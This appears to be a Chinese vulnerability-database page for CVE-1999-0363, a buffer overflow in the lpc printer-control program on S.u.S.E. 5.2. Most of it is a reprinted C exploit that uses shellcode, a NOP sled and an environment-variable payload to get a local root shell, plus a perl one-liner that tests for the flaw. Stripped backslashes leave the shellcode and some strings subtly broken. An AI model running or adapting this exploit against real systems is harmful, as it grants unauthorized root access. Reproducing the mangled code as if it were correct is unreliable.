S.u.S.E. 5.2 lpc漏洞

S.u.S.E. 5.2 lpc漏洞

漏洞ID 1105408 漏洞类型 缓冲区溢出
发布时间 1999-02-03 更新时间 2005-05-02
图片[1]-S.u.S.E. 5.2 lpc漏洞-安全小百科CVE编号 CVE-1999-0363
图片[2]-S.u.S.E. 5.2 lpc漏洞-安全小百科CNNVD-ID CNNVD-199902-008
漏洞平台 Linux CVSS评分 7.2
|漏洞来源
https://www.exploit-db.com/exploits/19259
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-199902-008
|漏洞详情
SuSE5.2PLPlpc程序存在漏洞。该程序存在缓冲区溢出,导致根妥协。
|漏洞EXP
source: http://www.securityfocus.com/bid/328/info


The PLP Line Printer Control program, shipped with S.u.S.E. 5.2 is vulnerable to a local remote buffer overflow. You can determine whether you're vulnerable or not by typing 'lpc'. If you're presented with an lpc version number, you're vulnerable. The consequences of lpc exploitation are root access for a local user. 

/*

Standard overflow for x86 linux lpc. PLP Line Printer Control program, version 4.0.3. Tested on SuSE 5.2 (suidroot). Test your copy of /usr/bin/lpc by trying an /usr/bin/lpc attach lp `perl -e "print 'A' x 1000"`;lpc status lp The problematic code is in displayq.c and control_ops.c, where we attempt to fscanf() the lockfile's contents into a fixed length buffer. See the Bugtraq post for full fix information(www.geek-girl.com/bugtraq).

The buffer we're overflowing is 256bytes, and an offset of 0 works just fine. Try in increments of +-100 if it doesn't work for you.

Obviously this is a complete rip of Aleph1's standard overflow program from his paper "smashing the stack for fun and profit".

to compile: gcc -o xnec_lpc xnec_lpc.c

bugs: only sets uid=0, and you may have to have a printer defined (lp on my box).

greets to #sk1llz

-xnec xnec on EF and DALnet, [email protected]

*/ #include <stdlib.h>

#define DEFAULT_OFFSET 0

#define DEFAULT_BUFFER_SIZE 356

#define DEFAULT_EGG_SIZE 2048

#define NOP 0x90

char pause;

char shellcode[] =

"xebx1fx5ex89x76x08x31xc0x88x46x07x89x46x0cxb0x0b"

"x89xf3x8dx4ex08x8dx56x0cxcdx80x31xdbx89xd8x40xcd"

"x80xe8xdcxffxffxff/bin/sh";

unsigned long get_esp(void) {

__asm__("movl %esp,%eax");

}

void main(int argc, char *argv[]) {

char *buff, *ptr, *egg;

long *addr_ptr, addr;

int offset=DEFAULT_OFFSET, bsize=DEFAULT_BUFFER_SIZE;

int i, eggsize=DEFAULT_EGG_SIZE;

if (argc > 1) bsize = atoi(argv[1]);

if (argc > 2) offset = atoi(argv[2]);

if (argc > 3) eggsize = atoi(argv[3]);

if (!(buff = malloc(bsize))) {

printf("Can't allocate memory.n");

exit(0);

}

if (!(egg = malloc(eggsize))) {

printf("Can't allocate memory.n");

exit(0);

}

addr = get_esp() - offset;

printf("Using address: 0x%xn", addr);

printf("nPLP Line Printer Control program, version 4.0.3 overflow.n");

printf("Bug found by xnec, code ripped from Aleph1. After running this program, simply compile and run:n---n

#include <unistd.h>

void main(){system("/bin/bash");}n---n");

scanf("%c", pause);

ptr = buff;

addr_ptr = (long *) ptr;

for (i = 0; i < bsize; i+=4)

*(addr_ptr++) = addr;

ptr = egg;

for (i = 0; i < eggsize - strlen(shellcode) - 1; i++)

*(ptr++) = NOP;

for (i = 0; i < strlen(shellcode); i++)

*(ptr++) = shellcode[i];

buff[bsize - 1] = '';

egg[eggsize - 1] = '';

memcpy(egg,"EGG=",4);

putenv(egg);

memcpy(buff,"RET=",4);

putenv(buff);

system("`which lpc` attach lp $RET; `which lpc` status lp");

}
|参考资料

来源:BID
名称:328
链接:http://www.securityfocus.com/bid/328

相关推荐: Debian Super Buffer Overflow Vulnerability

Debian Super Buffer Overflow Vulnerability 漏洞ID 1104816 漏洞类型 Boundary Condition Error 发布时间 1999-02-15 更新时间 1999-02-15 CVE编号 N/A CN…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享